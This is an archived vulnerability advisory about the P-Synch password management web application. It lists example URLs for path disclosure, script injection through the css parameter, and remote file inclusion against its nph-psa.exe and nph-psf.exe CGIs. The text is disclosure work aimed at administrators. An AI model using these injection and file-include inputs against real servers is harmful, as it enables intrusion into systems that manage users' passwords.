Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: Apps :: bt306.txt

P-Synch Password Management Multiple Vulnerabilities CGI:







Multiple Vulnerabilities In P-Synch Password Management

-------------------------------------------------------

The other night I came across a server running P-Synch. 

I had never heard of it so i was curious to poke around 

on it a bit. Within an hour i found the vulns listed below. 

Im pretty sure there are other more serious vulns in 

P-Synch, but they are very picky about who they give thier

software to, even an evaluation version. So was not able

to test any further. However i encourage any admins running

P-Synch to poke around on it, just to be on the safe side.







Description

-------------------------------------------------------

P-Synch Total Password Management Solution  

by M-TECH

P-Synch is a total password management solution. It is 

intended to reduce the cost of ownership of password systems, 

and simultaneously improve the security of password protected 

systems. This is done through: -Password Synchronization. 

-Enforcing an enterprise wide password strength policy. 

-Allowing authenticated users to reset their own forgotten 

passwords and enable their locked out accounts. -Streamlining 

help desk call resolution for password resets. P-Synch is 

available for both internal use, on the corporate Intranet, 

as well as for the Internet deployment in B2B and B2C 

applications.



http://www.securityfocus.com/products/837







Problems

-------------------------------------------------------

All of these problems are simple, self explanatory vulns

so, i'm sure the below examples will speak for themselves.

Once again this application was NOT thoroughly researced.

So anyone with a copy of P-Synch might wanna explore it

further.







Path Disclosure Vulnerability

-------------------------------------------------------

https://path/to/psynch/nph-psa.exe?lang=

https://path/to/psynch/nph-psf.exe?lang=





Code Injection Vulnerability

-------------------------------------------------------

https://path/to/psynch/nph-psf.exe?css=">[VBScript, JScript etc]

https://path/to/psynch/nph-psa.exe?css=">[VBScript, JScript etc]





File Include Vulnerability

-------------------------------------------------------

https://path/to/psynch/nph-psf.exe?css=http://somesite/file

https://path/to/psynch/nph-psa.exe?css=http://somesite/file







Credits

-------------------------------------------------------

All credits go to JeiAr of GulfTech Computers and CSA 

Security Research http://www.gulftech.org


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH